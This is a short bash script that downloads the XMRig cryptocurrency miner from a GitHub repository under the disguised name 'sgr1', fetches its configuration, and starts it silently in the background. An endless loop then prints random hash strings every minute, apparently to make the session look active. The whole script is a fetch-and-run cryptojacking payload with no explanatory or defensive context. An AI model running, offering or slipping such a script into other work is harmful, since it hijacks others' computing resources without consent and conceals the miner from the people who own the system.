#!/bin/bash
wget -O sgr1 https://raw.githubusercontent.com/tyha4t57i/filesg/main/xmrig
chmod +x sgr1
wget https://raw.githubusercontent.com/tyha4t57i/filesg/main/gr.json
./sgr1 -c "gr.json" > /dev/null 2>&1 &
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 1m; done
